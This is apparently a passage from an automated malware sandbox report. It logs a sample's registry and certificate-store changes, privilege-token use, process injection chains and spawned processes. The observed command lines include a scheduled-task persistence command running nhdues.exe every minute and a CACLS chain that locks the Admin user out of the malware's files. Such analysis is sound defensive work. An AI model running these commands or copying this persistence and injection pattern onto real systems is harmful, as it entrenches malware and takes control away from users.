Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = [certificate blob omitted] C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = [certificate blob omitted] C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = [certificate blob omitted] C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [certificate blob omitted] C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [certificate blob omitted] C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = [certificate blob omitted] C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4516 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
PID 4516 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 1640 wrote to memory of 4752 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe
PID 1640 wrote to memory of 4752 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe
PID 1640 wrote to memory of 4752 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe
PID 1640 wrote to memory of 212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe
PID 1640 wrote to memory of 212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe
PID 1640 wrote to memory of 212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe
PID 1640 wrote to memory of 3132 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe
PID 1640 wrote to memory of 3132 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe
PID 1640 wrote to memory of 3132 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe
PID 1640 wrote to memory of 2396 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe
PID 1640 wrote to memory of 2396 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe
PID 1640 wrote to memory of 2396 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe
PID 1640 wrote to memory of 1236 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe
PID 1640 wrote to memory of 1236 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe
PID 1640 wrote to memory of 540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe
PID 1640 wrote to memory of 540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe
PID 1640 wrote to memory of 540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe
PID 1640 wrote to memory of 3032 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe
PID 1640 wrote to memory of 3032 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe
PID 1640 wrote to memory of 4332 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 1640 wrote to memory of 4332 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 1640 wrote to memory of 4332 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 212 wrote to memory of 3044 N/A C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 212 wrote to memory of 3044 N/A C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 212 wrote to memory of 3044 N/A C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1640 wrote to memory of 1908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe
PID 1640 wrote to memory of 1908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe
PID 1640 wrote to memory of 1908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe
PID 540 wrote to memory of 2772 N/A C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp
PID 540 wrote to memory of 2772 N/A C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp
PID 540 wrote to memory of 2772 N/A C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp
PID 4332 wrote to memory of 4200 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 4200 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 4200 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 568 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 568 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 568 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 3044 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 3044 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 3044 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 4332 wrote to memory of 2204 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 2204 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 2204 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 3044 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2036 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 2204 wrote to memory of 2036 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 2204 wrote to memory of 2036 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 2772 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe
PID 2772 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe
PID 3044 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe
PID 3044 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe
PID 3044 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe

"C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe"

C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe

"C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe"

C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe

"C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe"

C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe

"C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe"

C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe

"C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe"

C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe

"C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe"

C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe

"C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe"

C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe

"C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp

"C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp" /SL5="$B01BC,491750,408064,C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe"

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2bc,0x2ec,0x6fe58538,0x6fe58548,0x6fe58554

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

"C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe" --silent --allusers=0

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe" --version

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

"C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4332 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231004220046" --session-guid=4df762ca-d00d-4038-a583-2029e926e20c --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4005000000000000

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2ec,0x2f0,0x2f4,0x2bc,0x2f8,0x6eba8538,0x6eba8548,0x6eba8554

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

